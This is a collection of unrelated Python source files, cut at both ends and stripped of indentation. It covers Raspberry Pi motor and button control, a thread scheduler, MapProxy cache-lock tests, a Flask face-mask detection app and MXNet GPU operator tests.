if '/dev/video' in result.path:
protocol = Protocol.V4L2
elif '%' in result.path:
protocol = Protocol.IMAGE
else:
protocol = Protocol.VIDEO
return protocol
@staticmethod
def _img_format(uri):
img_format = Path(uri).suffix[1:]
return 'jpeg' if img_format == 'jpg' else img_format
|
threadScheduler.py
|
import threading
import os.path
import time
from blueThreadLoop import MainBlue
# class myThread (threading.Thread):
# def __init__(self, threadID, name, counter):
# threading.Thread.__init__(self)
# self.threadID = threadID
# self.name = name
# self.counter = counter
# def run(self):
# print("Starting " + self.name)
# print_time(self.name, 5, self.counter)
# print("Exiting " + self.name)
run = True
runBlue = [True]
fileName = ""
def LookForFile(strToFind, path):
"""
function repeatedly look for a file
"""
# t1.setName("Finder")
global fileName
global run
count = 0
filePath = path + strToFind
while run:
count += 1
if os.path.exists(filePath):
fileName = strToFind
print("{0} FOUND {1} at {2} [{3}]".format(
t1.getName(), strToFind, filePath, count))
MainBlue(runBlue)
run = False
else:
print("{0} not found {1} at {2} [{3}]".format(
t1.getName(), strToFind, filePath, count))
time.sleep(1)
print("exiting file thread!")
def LookForStop(strToFind, path):
"""
function repeatedly look for a file
"""
global run
count = 0
filePath = path + strToFind
while run:
count += 1
if os.path.exists(filePath):
runBlue[0] = False
run = False
print("{0} FOUND {1} at {2} [{3}]".format(
t2.getName(), strToFind, filePath, count))
else:
print("{0} not found {1} at {2} [{3}]".format(
t2.getName(), strToFind, filePath, count))
time.sleep(10)
print("exiting stop thread!")
if __name__ == "__main__":
# creating thread
t1 = threading.Thread(
target=LookForFile, name="THREAD_Finder", args=("rain", "../"), daemon=True)
t2 = threading.Thread(name="THREAD_Stopper",
target=LookForStop, args=("stop", "../"), daemon=True)
# starting thread 1
t1.start()
# starting thread 2
t2.start()
while run:
print("doing nothing...")
time.sleep(20)
# input("Press Enter to flip foo")
# if runBlue[0]:
# runBlue[0] = False
# else:
# runBlue[0] = True
runBlue[0] = False
# input("Press Enter to exit")
run = False
# wait until thread 1 is completely executed
t1.join()
# wait until thread 2 is completely executed
t2.join()
# both threads completely executed
print("Done!")
|
piDcMotor.py
|
#!/usr/bin/python3
# File name : piDcMotor.py
# Description : encapsulates a DC motor connected via Raspberry Pi's GPIO
from time import sleep
from piServices.piUtils import timePrint, startThread
import RPi.GPIO as GPIO
from iotServerLib import piIotNode
# motor states:
# stop - the motor is stop
# starting - the motor is starting and ramping up to requested speed
# moving - the motor is moving at the requested speed
# stopping - the motor is ramping down to stop
MotorStop = 0
MotorStarting = 1
MotorMoving = 2
MotorStopping = 3
# constants
MaxSpeed = 100
MinSpeed = 5 # the minimum speed that consider to be stop (in absolute value)
class PiDcMotor(piIotNode.PiIotNode):
""" controller for a DC motor connected via Raspberry Pi's GPIO
The motor speed control is under a separate thread that start the motor with higher speed (higher torque).
Once started, it would reduce the speed gradually to the requested speed.
There are 4 states: MotorStop, MotorStarting, MotorMoving, MotorStopping
"""
def __init__(self, name, parent, enable, in1, in2, threadCycle=0.05, deltaSpeedPerCycle=5):
""" construct a PiIotNode
name: the name of the node
parent: parent IotNode object. None for root node.
enable: pin number for enable
in1: pin number for in1
in2: pin number for in2
threadCycle: the delay time between the thread processing
deltaSpeedPerCycle: increase/decrease the speed per cycle when starting motor
"""
super(PiDcMotor, self).__init__(name, parent)
self.threadCycleInSecond = threadCycle
self.deltaSpeedPerCycle = deltaSpeedPerCycle
self.initialize(enable, in1, in2)
def initialize(self, enable, in1, in2):
""" initialize the DC motor connected via controller similar to L293D
input arguments:
enable: pin number for enable
in1: pin number for in1
in2: pin number for in2
"""
self.enable = enable
self.in1 = in1
self.in2 = in2
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BOARD)
GPIO.setup(enable, GPIO.OUT)
GPIO.setup(in1, GPIO.OUT)
GPIO.setup(in2, GPIO.OUT)
try:
self.pwm = GPIO.PWM(enable, 1000)
except:
pass
# start thread for fine control of motor speed
self._requestedSpeed = 0
self._extraSpeed = 0
self._extraSteeringSpeed = 0
self.motorThread=startThread('Motor Control', target=self._motorControl)
def stop(self):
""" stop the motor """
self._requestedSpeed = 0
return self.speed
def run(self, speed):
""" run the motor with specified speed
speed > 0 run forward max 100
speed < 0 run reverse max -100
speed = 0 stop
return the running speed
"""
self._requestedSpeed = speed
timePrint('Run motor %s at requested speed %i' %(self.name, speed))
return self.speed
def extraSteeringSpeed(self, deltaSpeed):
""" add extra torque speed for steering in addition to the run speed by run(speed) """
self._extraSteeringSpeed = deltaSpeed
def extraSpeed(self, deltaSpeed):
""" request extra speed in addition to the run speed by run(speed) """
self._extraSpeed = deltaSpeed
def _stop(self):
""" internal method to stop the motor """
GPIO.output(self.in1, GPIO.LOW)
GPIO.output(self.in2, GPIO.LOW)
GPIO.output(self.enable, GPIO.LOW)
self.speed = 0
self._motorState = MotorStop
timePrint('Stop motor %s' %self.name)
return self.speed
def _run(self, speed):
""" internal method to run the motor with specified speed
speed > 0 run forward max 100
speed < 0 run reverse max -100
speed = 0 stop
return the running speed
"""
if speed == 0: # stop
self.stop()
elif speed > 0: # forward
speed = min(speed, 100)
GPIO.output(self.in1, GPIO.HIGH)
GPIO.output(self.in2, GPIO.LOW)
self.pwm.start(100)
self.pwm.ChangeDutyCycle(speed)
else: # reverse
speed = max(speed, -100)
GPIO.output(self.in1, GPIO.LOW)
GPIO.output(self.in2, GPIO.HIGH)
self.pwm.start(0)
self.pwm.ChangeDutyCycle(abs(speed))
self.speed = speed
#timePrint('Run motor %s at speed %i' %(self.name, self.speed))
return self.speed
def _motorControl(self):
""" control motor speed must be run in separate thread """
self._stop()
while True:
absRequestedSpeed = abs(self._requestedSpeed)
extraSpeed = self._extraSpeed + self._extraSteeringSpeed
absRunSpeed = abs(self._requestedSpeed) + extraSpeed
if absRequestedSpeed < MinSpeed or absRunSpeed < MinSpeed:
if self._motorState != MotorStop:
self._stop()
else:
if self._motorState == MotorStop:
# starting the motor
if self._requestedSpeed > 0:
self._run(MaxSpeed)
else:
self._run(-MaxSpeed)
self._motorState = MotorStarting
#timePrint('Motor %s State: %i extra: %i' %(self.name, self._motorState, extraSpeed))
elif self._motorState == MotorStarting:
# send new speed for the motor
self._motorStarting(absRunSpeed)
elif self._motorState == MotorMoving:
# motor is already running so just check the speed
if absRunSpeed != abs(self.speed):
self._motorState = MotorStarting
self._motorStarting(absRunSpeed)
#timePrint('Motor %s State: %i extra: %i' %(self.name, self._motorState, extraSpeed))
sleep(self.threadCycleInSecond)
def _motorStarting(self, absRunSpeed):
""" this is for the state MotorStarting to calculate new speed for the motor """
absNewSpeed = abs(self.speed) - self.deltaSpeedPerCycle
if absNewSpeed <= absRunSpeed:
absNewSpeed = absRunSpeed
self._motorState = MotorMoving
#timePrint('Motor %s State: %i extra: %i' %(self.name, self._motorState, self._extraSpeed))
if self._requestedSpeed > 0:
self._run(absNewSpeed)
else:
self._run(-absNewSpeed)
|
test_seed_cachelock.py
|
# This file is part of the MapProxy project.
# Copyright (C) 2012 Omniscale <http://omniscale.de>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import with_statement
import multiprocessing
import os
import shutil
import tempfile
import time
from mapproxy.seed.cachelock import CacheLocker, CacheLockedError
class TestCacheLock(object):
def setup(self):
self.tmp_dir = tempfile.mkdtemp()
self.lock_file = os.path.join(self.tmp_dir, 'lock')
def teardown(self):
shutil.rmtree(self.tmp_dir)
def test_free_lock(self):
locker = CacheLocker(self.lock_file)
with locker.lock('foo'):
assert True
def test_locked_by_process_no_block(self):
proc_is_locked = multiprocessing.Event()
def lock():
locker = CacheLocker(self.lock_file)
with locker.lock('foo'):
proc_is_locked.set()
time.sleep(10)
p = multiprocessing.Process(target=lock)
p.start()
# wait for process to start
proc_is_locked.wait()
locker = CacheLocker(self.lock_file)
# test unlocked bar
with locker.lock('bar', no_block=True):
assert True
# test locked foo
try:
with locker.lock('foo', no_block=True):
assert False
except CacheLockedError:
pass
finally:
p.terminate()
p.join()
def test_locked_by_process_waiting(self):
proc_is_locked = multiprocessing.Event()
def lock():
locker = CacheLocker(self.lock_file)
with locker.lock('foo'):
proc_is_locked.set()
time.sleep(.1)
p = multiprocessing.Process(target=lock)
start_time = time.time()
p.start()
# wait for process to start
proc_is_locked.wait()
locker = CacheLocker(self.lock_file, polltime=0.02)
try:
with locker.lock('foo', no_block=False):
diff = time.time() - start_time
assert diff > 0.1
finally:
p.terminate()
p.join()
|
button.py
|
import os
import threading
import time
if os.uname()[1] == 'raspberrypi':
import RPi.GPIO as GPIO
class ArcadeButton:
def __init__(self):
if os.uname()[1] == 'raspberrypi':
GPIO.setmode(GPIO.BCM)
GPIO.setup(4, GPIO.OUT)
GPIO.setup(5, GPIO.IN, pull_up_down=GPIO.PUD_UP)
self.keep_blinking = True
self.count = 0
def start_blink(self):
self.keep_blinking = True
self.blink_thread = threading.Thread(target=self._blink).start()
def stop_blink(self):
self.keep_blinking = False
def get_status(self):
if os.uname()[1] == 'raspberrypi':
return GPIO.input(5)
else:
if self.count <= 5:
time.sleep(1)
self.count = self.count + 1
return True
else:
self.count = 0
return False
def _blink(self):
while(self.keep_blinking):
if os.uname()[1] == 'raspberrypi':
GPIO.output(4, 1)
time.sleep(1)
GPIO.output(4, 0)
time.sleep(1)
else:
print('blink on')
time.sleep(1)
print('blink off')
time.sleep(1)
|
maskdetection.py
|
import os
import threading
import argparse
import filetype
import base64
import cv2
import numpy as np
from PIL import Image
from io import BytesIO
from datetime import datetime
from flask import Flask, Response, make_response, send_file
from flask import flash, request, redirect, jsonify
from flask import render_template
from models.realStream import RealStream
from models.facenet import FaceNet
from models.util import utils
# initialize a flask object
app = Flask(__name__)
@app.route("/")
def index():
# return the rendered template
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
return render_template("index.html")
@app.route("/realstream/")
def realStream():
# start a thread that will start a video stream
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to real stream page
return render_template("realStream.html")
@app.route("/staticstream/")
def staticstream():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to static stream page
return render_template("staticStream.html")
@app.route("/imageprocess/")
def imageprocess():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
return render_template("imageprocess.html")
@app.route("/about/")
def about():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to about page
return render_template("about.html")
@app.route("/contact/")
def contact():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to contact page
return render_template("contact.html")
@app.route("/imageCapture/")
def imageCapture():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to register page
return render_template("imageCapture.html")
@app.route("/videoCapture/")
def videoCapture():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to register page
return render_template("videoCapture.html")
#---------------------------------------------------------------------
#----------------------------Functions--------------------------------
#---------------------------------------------------------------------
@app.route("/uploadfile", methods=['GET', 'POST'])
def uploadfile():
if request.method == 'POST':
# save file
file = request.files['uploadFile']
result = utils.save_file(file)
if result == 0:
print("file saved failed.")
else:
print("file saved successful.")
# call function to process it
rs = RealStream()
# check file type
filepath = utils.get_file_path('webApp/uploads', file.filename)
print(filepath)
if filetype.is_image(filepath):
output = rs.processimage(file.filename)
elif filetype.is_video(filepath):
output = rs.processvideo(file.filename)
else:
print("delete it.")
# allow user to download after process it
return jsonify({'filename': output})
@app.route("/video_feed")
def video_feed():
# return the response generated along with the media type (mime type)
global t
# start a thread that will perform mask detection
rs = RealStream()
t = threading.Thread(target=rs.mask_detection)
t.daemon = True
t.start()
return Response(rs.generate(), mimetype = "multipart/x-mixed-replace; boundary=frame")
@app.route("/download/<fileName>", methods=['GET'])
def download(fileName):
file = utils.get_file_path('static/processed', fileName)
response = make_response(send_file(file))
response.headers["Content-Disposition"] = "attachment; filename={};".format(file)
return response
@app.route("/content_dash", methods=['GET'])
def content_dash():
data = request.values
if data['type'] == 'imagecode':
return render_template('imagecode.html')
if data['type'] == 'imageprocess':
return render_template('imageprocess.html')
if data['type'] == 'folderscan':
return render_template('folderscan.html')
@app.route('/uploadImage', methods=['GET', 'POST'])
def uploadImage():
if request.method == 'POST':
# check if the post request has the file part
if 'uploadImage' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['uploadImage']
# save file first
utils.save_file(file)
# encoding and save into db
fn = FaceNet()
username = request.form['username']
(status, message) = fn.save_encode_db(username, file.filename)
response = make_response({"message":message})
response.status_code = status
# response.mimetype = 'text/plain'
# response.headers['x-tag'] = 'sth.magic'
return response
@app.route('/uploadImageBase64', methods=['GET', 'POST'])
def uploadImageBase64():
if request.method == 'POST':
username = request.form['username']
imagebase64 = request.form['imageBase64']
# convert base64 string to image
offset = imagebase64.index(',')+1
img_bytes = base64.b64decode(imagebase64[offset:])
img = Image.open(BytesIO(img_bytes))
img = np.array(img)
# write to file first
filename = datetime.now().strftime("%Y%m%d-%H%M%S") + '.png'
cv2.imwrite(utils.get_file_path('webApp/uploads', filename), utils.toRGB(img))
# encoding and save into db
fn = FaceNet()
(status, message) = fn.save_encode_db(username, filename)
# processed file name
basename = os.path.splitext(os.path.basename(filename))[0]
extention = os.path.splitext(os.path.basename(filename))[1]
processedFile = basename+"_face"+extention
response = make_response(jsonify({"message":message, "filename": processedFile}))
response.status_code = status
return response
# execute function
if __name__ == '__main__':
# construct the argument parser and parse command line arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--ip", type=str, default="127.0.0.1", help="ip address")
ap.add_argument("-o", "--port", type=int, default=8000, help="port number of the server")
args = vars(ap.parse_args())
# start the flask app
app.run(host=args["ip"], port=args["port"], debug=True, threaded=True, use_reloader=False)
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import unittest
import mxnet as mx
import numpy as np
import unittest
from nose.tools import assert_raises
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal
from mxnet.base import MXNetError
from mxnet import autograd
from numpy.testing import assert_allclose
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied
from common import run_in_spawned_process
from test_operator import *
from test_numpy_ndarray import *
from test_optimizer import *
from test_random import *
from test_exc_handling import *
#from test_rnn import *
from test_sparse_ndarray import *
from test_sparse_operator import *
from test_ndarray import *
from test_subgraph_op import *
from test_contrib_operator import test_multibox_target_op
from test_tvm_op import *
from test_library_loading import *
set_default_context(mx.gpu(0))
del test_support_vector_machine_l1_svm # noqa
del test_support_vector_machine_l2_svm # noqa
del test_custom_op_fork #noqa
def check_countsketch(in_dim,out_dim,n):
data = mx.sym.Variable("data")
h = mx.sym.Variable("h")
s = mx.sym.Variable("s")
sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
locations = {"data": x, "h": h, "s": s}
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
@with_seed()
def test_countsketch():
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1, maxn)
check_countsketch(in_dim, out_dim, n)
def check_ifft(shape):
shape_old = shape
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1]*2)
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1],shape[2],shape[3]*2)
sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
if len(shape) == 2:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[1]):
init_complex.real[:,i] = init[0][:,2*i]
init_complex.imag[:,i] = init[0][:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[3]):
init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[1]):
temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[3]):
temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
@with_seed()
def test_ifft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_ifft(shape)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0],rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[3],rtol=1e-3, atol=1e-5)
@with_seed()
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
@with_seed()
def test_batchnorm_with_type():
ctx_list_v1_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
]
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}}
]
# V1, 2D
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
check_consistency(sym, ctx_list_v1_2D)
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
check_consistency(sym, ctx_list_v1_2D)
# V2, 2D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
#
# # V2, 3D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNormV1 cpu
if 'batchnorm_v1_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNormV1 gpu (organic)
if 'batchnorm_v1_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
'batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
